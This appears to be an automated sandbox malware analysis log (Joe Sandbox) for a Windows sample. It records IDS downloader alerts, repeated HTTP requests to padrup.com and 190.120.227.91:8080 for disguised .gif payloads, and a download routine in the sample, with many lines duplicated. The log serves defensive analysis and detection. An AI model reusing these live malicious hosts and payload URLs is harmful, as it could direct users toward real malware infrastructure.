            Source: global trafficUDP traffic: 192.168.2.7:56350 -> 77.81.228.140:5960
            Source: global trafficUDP traffic: 192.168.2.7:56351 -> 81.199.91.188:4980
            Source: global trafficUDP traffic: 192.168.2.7:56352 -> 190.111.22.45:6065
            Source: global trafficUDP traffic: 192.168.2.7:56353 -> 85.204.112.3:6244
            Source: global trafficUDP traffic: 192.168.2.7:56354 -> 183.83.90.202:5218
            Source: global trafficUDP traffic: 192.168.2.7:56355 -> 178.233.92.89:4980
            Source: global trafficUDP traffic: 192.168.2.7:56356 -> 196.201.129.61:5078
            Source: global trafficUDP traffic: 192.168.2.7:56357 -> 195.46.33.124:6538
            Source: global trafficUDP traffic: 192.168.2.7:56358 -> 94.55.239.88:5549
            Source: Joe Sandbox ViewIP Address: 185.53.178.50 185.53.178.50
            Source: Joe Sandbox ViewIP Address: 185.53.178.50 185.53.178.50
            Source: Joe Sandbox ViewASN Name: SARAONLINEINFORMATICAEIRELI-MEBR SARAONLINEINFORMATICAEIRELI-MEBR
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49758 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49737 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49813 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49790 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49783 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49913 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49824 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49764 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49888 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49851 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49881 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49731 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49845 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62459 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62532 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62535 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62514 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62524 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62516 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62531 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62517 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62525 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62519 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62534 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62487 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62510 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62533 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62513 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62528 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49922 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62521 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49943 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62529 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62527 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62522 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62518 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62526 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62493 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62512 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62530 -> 185.53.178.50:80
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?52dc95=21721684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?53c2ee=32936340 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?a66df5=87257000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?c5c499=38882763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?14117e3=189388539 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?15f8580=23037312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1edc267=64718030 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?212b208=34779656 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2a0a14c=132244452 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2bf5c9b=276573090 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3467cb5=274755465 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?36c07fa=459292624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3f9f77c=600421212 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4194e9e=343836950 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?4b65019=711512289 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4d57b0b=162199062 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?568bd78=635252296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?588b379=464224605 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?617d87e=1022260460 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?653dba7=849272120 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?6eac3db=348146577 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?70c2488=591181480 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?7a93601=771179526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?7ca48dd=653487185 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?87df311=569887812 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?9db5459=1322951368 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?f24e375=-2008285411 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?10aef23e=1959305138 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?158b8302=722929156 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?167a9d17=1508537436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1bfc4aa7=-538815176 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1c6e18df=476977375 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?8dc219=65031855 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?90f197=37996124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?16eca60=240379840 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1883db2=179941342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?29e644c=439347960 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2c177da=138700686 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3d9ecca=64613578 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?3fa5859=600644385 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01290945 lstrcpy,InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_01290945
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?52dc95=21721684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?53c2ee=32936340 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?a66df5=87257000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?c5c499=38882763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?14117e3=189388539 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?15f8580=23037312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1edc267=64718030 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?212b208=34779656 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2a0a14c=132244452 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2bf5c9b=276573090 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3467cb5=274755465 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?36c07fa=459292624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3f9f77c=600421212 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4194e9e=343836950 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?4b65019=711512289 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4d57b0b=162199062 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?568bd78=635252296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?588b379=464224605 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?617d87e=1022260460 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?653dba7=849272120 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?6eac3db=348146577 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?70c2488=591181480 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?7a93601=771179526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?7ca48dd=653487185 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?87df311=569887812 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?9db5459=1322951368 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?f24e375=-2008285411 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?10aef23e=1959305138 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?158b8302=722929156 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?167a9d17=1508537436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1bfc4aa7=-538815176 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1c6e18df=476977375 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?8dc219=65031855 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?90f197=37996124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?16eca60=240379840 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1883db2=179941342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?29e644c=439347960 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2c177da=138700686 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3d9ecca=64613578 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?3fa5859=600644385 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
            Source: SearchApp.exe, 0000000F.00000000.1605212499.000001F4AE90E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: $https://www.google.www.yahoo.cn.bing.www.baidu.www.bing.www.yandex.google chrome equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: padrup.com
